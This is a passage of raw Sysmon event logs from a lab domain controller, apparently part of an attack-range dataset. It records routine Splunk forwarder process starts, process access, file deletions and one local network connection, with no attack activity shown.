22:54:09.395{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7091-603D-6388-00000000AD01}8108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.395{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7091-603D-6388-00000000AD01}8108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.396{05ADC7E1-7091-603D-6388-00000000AD01}8108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001695961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:09.070{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F670084A839135FF86DC12F626DEDC51,SHA256=78419D444A3EC08781F92133CE7BA2092A5D7DD19B73E13D058FD014D24B2982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:10.167{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02A5BEB2569CBC77696910A4FEB7332B,SHA256=976573CF960F8C527E45BD4CBCDC9CB11A3BDDB485D8EDDFF2A12F66FD0CD35A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:10.145{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35739ED837ED54CB1090DEEFC99C226C,SHA256=8FEC6EC899CAB8069DBEF5631A8EC6CCAF42D2311FC70569D25E444933908F90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:11.164{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A9051B7711C30847D76834999C83C3,SHA256=B8FCA2B642C99FEE1BBDFEC05E1E41212C98A1E207BB5BA66281067A4159A62B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.872{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7094-603D-6588-00000000AD01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.870{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.869{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.869{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.869{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.869{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7094-603D-6588-00000000AD01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.868{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7094-603D-6588-00000000AD01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.866{05ADC7E1-7094-603D-6588-00000000AD01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001695983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.395{05ADC7E1-7094-603D-6488-00000000AD01}79645184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.223{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D19FD1CDA6AF9CF988D107EC109CE1E4,SHA256=A8951AE9F72DDCCBC6004B64C41A96D98644032B57962F55CF5F4E25DC02111A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7094-603D-6488-00000000AD01}7964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-7094-603D-6488-00000000AD01}7964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.208{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-7094-603D-6488-00000000AD01}7964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:12.209{05ADC7E1-7094-603D-6488-00000000AD01}7964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001696003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:05.547{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55138-false10.0.1.12-8000- 10341000x80000000000000001696002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-7095-603D-6688-00000000AD01}8672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:13.536{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-7095-603D-6688-00000000AD01}8672C:\Program 